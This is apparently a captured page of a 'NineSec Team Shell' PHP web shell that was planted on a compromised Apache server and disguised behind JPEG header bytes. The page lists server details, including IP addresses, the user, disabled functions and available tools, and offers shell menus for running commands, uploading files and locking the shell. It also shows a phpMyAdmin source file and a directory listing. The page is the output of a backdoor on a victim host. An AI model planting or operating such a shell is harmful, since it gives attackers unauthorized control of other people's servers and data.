�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /home/readytorun/domains/demo.readytorun.it/public_html/phmad/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/readytorun/domains/demo.readytorun.it/public_html/phmad/show_config_errors.php
<?php
/**
 * Simple wrapper just to enable error reporting and include config
 */

declare(strict_types=1);

if (! defined('ROOT_PATH')) {
    // phpcs:disable PSR1.Files.SideEffects
    define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR);
    // phpcs:enable
}

// rfc2616 - Section 14.21
header('Expires: ' . gmdate(DATE_RFC1123));
// HTTP/1.1
header('Cache-Control: no-store, no-cache, must-revalidate,  pre-check=0, post-check=0, max-age=0');

header('Pragma: no-cache'); // HTTP/1.0
// test case: exporting a database into a .gz file with Safari
// would produce files not having the current time
// (added this header for Safari but should not harm other browsers)
header('Last-Modified: ' . gmdate(DATE_RFC1123));

header('Content-Type: text/html; charset=utf-8');

// phpcs:disable PSR1.Files.SideEffects
define('PHPMYADMIN', true);
// phpcs:enable

require ROOT_PATH . 'libraries/constants.php';

// issue #16256 - This only works with php 8.0+
if (function_exists('error_reporting')) {
    error_reporting(E_ALL);
}

/**
 * Read config file.
 */
if (is_readable(CONFIG_FILE)) {
    /** @psalm-suppress MissingFile */
    include CONFIG_FILE;
}

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
December 20 2025 8:42:10
readytorun
0755
doc
--
September 11 2024 5:18:57
readytorun
0755
examples
--
September 11 2024 5:18:57
readytorun
0755
js
--
September 11 2024 5:18:57
readytorun
0755
libraries
--
September 11 2024 5:18:57
readytorun
0755
sql
--
September 11 2024 5:18:57
readytorun
0755
templates
--
September 11 2024 5:18:57
readytorun
0755
themes
--
September 11 2024 5:18:57
readytorun
0755
tmp
--
September 11 2024 5:18:57
readytorun
0755
vendor
--
September 11 2024 5:18:57
readytorun
0755
.htaccess
0.124 KB
November 14 2025 9:26:18
readytorun
0444
.rtlcssrc.json
0.02 KB
August 28 2023 5:01:54
readytorun
0777
CONTRIBUTING.md
2.526 KB
August 28 2023 5:01:54
readytorun
0777
ChangeLog
62.894 KB
August 28 2023 5:01:54
readytorun
0777
LICENSE
17.668 KB
August 28 2023 5:01:54
readytorun
0777
README
1.484 KB
August 28 2023 5:01:54
readytorun
0777
RELEASE-DATE-5.2.0
0.028 KB
August 28 2023 5:01:54
readytorun
0777
babel.config.json
0.067 KB
August 28 2023 5:01:54
readytorun
0777
composer.json
4.647 KB
August 28 2023 5:01:54
readytorun
0777
composer.lock
255.523 KB
August 28 2023 5:01:54
readytorun
0777
config.inc.php
70.987 KB
August 28 2023 5:01:54
readytorun
0777
config.sample.inc.php
4.667 KB
August 28 2023 5:01:54
readytorun
0777
favicon.ico
21.959 KB
August 28 2023 5:01:54
readytorun
0777
index.php
1.049 KB
August 28 2023 5:01:54
readytorun
0777
package.json
2.72 KB
August 28 2023 5:01:54
readytorun
0777
robots.txt
0.025 KB
August 28 2023 5:01:54
readytorun
0777
show_config_errors.php
1.126 KB
August 28 2023 5:01:54
readytorun
0777
url.php
0.942 KB
August 28 2023 5:01:54
readytorun
0777
yarn.lock
243.229 KB
August 28 2023 5:01:54
readytorun
0777

NineSec Team - 2022